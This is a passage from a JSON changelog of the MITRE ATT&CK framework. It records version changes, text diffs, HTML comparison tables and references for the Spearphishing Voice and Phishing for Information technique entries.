                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:04:48.737000+00:00\", \"old_value\": \"2025-07-02 18:06:37.932000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\\n\\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\\n\\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)\", \"old_value\": \"Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\\n\\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\\n\\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\\n+Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1684/001)) and/or creating a sense of urgency or alarm for the recipient.\\n \\n All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Tools](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to1__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to1__0\"><a href=\"#difflib_chg_to1__top\">t</a></td><td class=\"diff_header\" id=\"from1_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;use&nbsp;voice&nbsp;communications&nbsp;to&nbsp;ultimately&nbsp;gain&nbsp;</td><td class=\"diff_next\"><a href=\"#difflib_chg_to1__top\">t</a></td><td class=\"diff_header\" id=\"to1_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;use&nbsp;voice&nbsp;communications&nbsp;to&nbsp;ultimately&nbsp;gain&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access&nbsp;to&nbsp;victim&nbsp;systems.&nbsp;Spearphishing&nbsp;voice&nbsp;is&nbsp;a&nbsp;specific&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access&nbsp;to&nbsp;victim&nbsp;systems.&nbsp;Spearphishing&nbsp;voice&nbsp;is&nbsp;a&nbsp;specific&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">variant&nbsp;of&nbsp;spearphishing.&nbsp;It&nbsp;is&nbsp;different&nbsp;from&nbsp;other&nbsp;forms&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">variant&nbsp;of&nbsp;spearphishing.&nbsp;It&nbsp;is&nbsp;different&nbsp;from&nbsp;other&nbsp;forms&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">f&nbsp;spearphishing&nbsp;in&nbsp;that&nbsp;it&nbsp;employs&nbsp;the&nbsp;use&nbsp;of&nbsp;manipulating&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">f&nbsp;spearphishing&nbsp;in&nbsp;that&nbsp;it&nbsp;employs&nbsp;the&nbsp;use&nbsp;of&nbsp;manipulating&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;user&nbsp;into&nbsp;providing&nbsp;access&nbsp;to&nbsp;systems&nbsp;through&nbsp;a&nbsp;phone&nbsp;call&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;user&nbsp;into&nbsp;providing&nbsp;access&nbsp;to&nbsp;systems&nbsp;through&nbsp;a&nbsp;phone&nbsp;call&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;other&nbsp;forms&nbsp;of&nbsp;voice&nbsp;communications.&nbsp;Spearphishing&nbsp;freque</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;other&nbsp;forms&nbsp;of&nbsp;voice&nbsp;communications.&nbsp;Spearphishing&nbsp;freque</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntly&nbsp;involves&nbsp;social&nbsp;engineering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntly&nbsp;involves&nbsp;social&nbsp;engineering&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;a&nbsp;trusted&nbsp;source&nbsp;(ex:&nbsp;[Impersonation](https://attack.mitr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;a&nbsp;trusted&nbsp;source&nbsp;(ex:&nbsp;[Impersonation](https://attack.mitr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T16<span class=\"diff_chg\">56</span>))&nbsp;and/or&nbsp;creating&nbsp;a&nbsp;sense&nbsp;of&nbsp;urgency&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T16<span class=\"diff_chg\">84/001</span>))&nbsp;and/or&nbsp;creating&nbsp;a&nbsp;sense&nbsp;of&nbsp;urge</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;alarm&nbsp;for&nbsp;the&nbsp;recipient.&nbsp;&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;elect</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ncy&nbsp;or&nbsp;alarm&nbsp;for&nbsp;the&nbsp;recipient.&nbsp;&nbsp;All&nbsp;forms&nbsp;of&nbsp;phishing&nbsp;are&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ronically&nbsp;delivered&nbsp;social&nbsp;engineering.&nbsp;In&nbsp;this&nbsp;scenario,&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lectronically&nbsp;delivered&nbsp;social&nbsp;engineering.&nbsp;In&nbsp;this&nbsp;scenario</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versaries&nbsp;are&nbsp;not&nbsp;directly&nbsp;sending&nbsp;malware&nbsp;to&nbsp;a&nbsp;victim&nbsp;vice&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;adversaries&nbsp;are&nbsp;not&nbsp;directly&nbsp;sending&nbsp;malware&nbsp;to&nbsp;a&nbsp;victim&nbsp;v</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">relying&nbsp;on&nbsp;[User&nbsp;Execution](https://attack.mitre.org/techniq</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ice&nbsp;relying&nbsp;on&nbsp;[User&nbsp;Execution](https://attack.mitre.org/tec</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1204)&nbsp;for&nbsp;delivery&nbsp;and&nbsp;execution.&nbsp;For&nbsp;example,&nbsp;victims&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hniques/T1204)&nbsp;for&nbsp;delivery&nbsp;and&nbsp;execution.&nbsp;For&nbsp;example,&nbsp;vict</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;instruct&nbsp;them&nbsp;to&nbsp;call&nbsp;a&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ims&nbsp;may&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;instruct&nbsp;them&nbsp;to&nbsp;call</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hone&nbsp;number&nbsp;where&nbsp;they&nbsp;are&nbsp;directed&nbsp;to&nbsp;visit&nbsp;a&nbsp;malicious&nbsp;URL</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;a&nbsp;phone&nbsp;number&nbsp;where&nbsp;they&nbsp;are&nbsp;directed&nbsp;to&nbsp;visit&nbsp;a&nbsp;malicious</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;download&nbsp;malware,(Citation:&nbsp;sygnia&nbsp;Luna&nbsp;Month)(Citation:&nbsp;C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;URL,&nbsp;download&nbsp;malware,(Citation:&nbsp;sygnia&nbsp;Luna&nbsp;Month)(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ISA&nbsp;Remote&nbsp;Monitoring&nbsp;and&nbsp;Management&nbsp;Software)&nbsp;or&nbsp;install&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;CISA&nbsp;Remote&nbsp;Monitoring&nbsp;and&nbsp;Management&nbsp;Software)&nbsp;or&nbsp;instal</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versary-accessible&nbsp;remote&nbsp;management&nbsp;tools&nbsp;([Remote&nbsp;Access&nbsp;T</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;adversary-accessible&nbsp;remote&nbsp;management&nbsp;tools&nbsp;([Remote&nbsp;Acce</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ools](https://attack.mitre.org/techniques/T1219))&nbsp;onto&nbsp;their</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;Tools](https://attack.mitre.org/techniques/T1219))&nbsp;onto&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;computer.(Citation:&nbsp;Unit42&nbsp;Luna&nbsp;Moth)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">heir&nbsp;computer.(Citation:&nbsp;Unit42&nbsp;Luna&nbsp;Moth)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;combine&nbsp;voice&nbsp;phishing&nbsp;with&nbsp;[Multi-Factor&nbsp;Authentication&nbsp;Re</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">also&nbsp;combine&nbsp;voice&nbsp;phishing&nbsp;with&nbsp;[Multi-Factor&nbsp;Authenticatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">quest&nbsp;Generation](https://attack.mitre.org/techniques/T1621)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Request&nbsp;Generation](https://attack.mitre.org/techniques/T1</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;trick&nbsp;users&nbsp;into&nbsp;divulging&nbsp;MFA&nbsp;credentials&nbsp;or&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">621)&nbsp;in&nbsp;order&nbsp;to&nbsp;trick&nbsp;users&nbsp;into&nbsp;divulging&nbsp;MFA&nbsp;credentials&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccepting&nbsp;authentication&nbsp;prompts.(Citation:&nbsp;Proofpoint&nbsp;Vishin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;accepting&nbsp;authentication&nbsp;prompts.(Citation:&nbsp;Proofpoint&nbsp;Vi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">shing)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0245: Detection Strategy for Spearphishing Voice across OS platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-02 17:07:01.502000+00:00",
                    "modified": "2026-04-17 16:15:21.344000+00:00",
                    "name": "Phishing for Information",
                    "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "reconnaissance"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1598",
                            "external_id": "T1598"
                        },
                        {
                            "source_name": "Avertium callback phishing",
                            "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.",
                            "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"
                        },
                        {
                            "source_name": "TrendMictro Phishing",
                            "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.",
                            "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"
                        },
                        {
                            "source_name": "Sophos Attachment",
                            "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020.",
                            "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/"
                        },
                        {
                            "source_name": "cyberproof-double-bounce",
                            "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.",
                            "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
                        },
                        {
                            "source_name": "PCMag FakeLogin",
                            "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.",
                            "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages"
                        },
                        {
                            "source_name": "Microsoft OAuth Spam 2022",
                            "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"
                        },
                        {
                            "source_name": "ThreatPost Social Media Phishing",
                            "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.",
                            "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/"
                        },
                        {
                            "source_name": "Proofpoint-spoof",
                            "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.",
                            "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"
                        },
                        {
                            "source_name": "GitHub Phishery",
                            "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.",
                            "url": "https://github.com/ryhanson/phishery"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 VBA Infostealer 2014",
                            "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Philip Winther",
                        "Sebastian Salla, McAfee",
                        "Robert Simmons, @MalwareUtkonos",
                        "Ohad Zaidenberg, @ohad_mz",
                        "Liora Itkin",
                        "Liran Ravich, CardinalOps",
                        "Scott Cook, Capital One"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:15:21.344000+00:00\", \"old_value\": \"2025-10-24 17:49:24.096000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\\n\\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\\n\\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\\n\\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \\n\\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\", \"old_value\": \"Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\\n\\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\\n\\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\\n\\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \\n\\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\", \"diff\": \"--- \\n+++ \\n@@ -4,6 +4,6 @@\\n \\n Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\\n \\n-Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \\n+Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1684/002)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \\n \\n Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"ACSC Email Spoofing\", \"description\": \"Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.\", \"url\": \"https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf\"}, \"root['external_references'][7]\": {\"source_name\": \"Microsoft Anti Spoofing\", \"description\": \"Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide\"}}}",
                    "previous_version": "1.4",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to11__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to11__0\"><a href=\"#difflib_chg_to11__top\">t</a></td><td class=\"diff_header\" id=\"from11_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;phishing&nbsp;messages&nbsp;to&nbsp;elicit&nbsp;sensitive&nbsp;i</td><td class=\"diff_next\"><a href=\"#difflib_chg_to11__top\">t</a></td><td class=\"diff_header\" id=\"to11_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;send&nbsp;phishing&nbsp;messages&nbsp;to&nbsp;elicit&nbsp;sensitive&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nformation&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;targeting.&nbsp;Phishing&nbsp;for&nbsp;i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 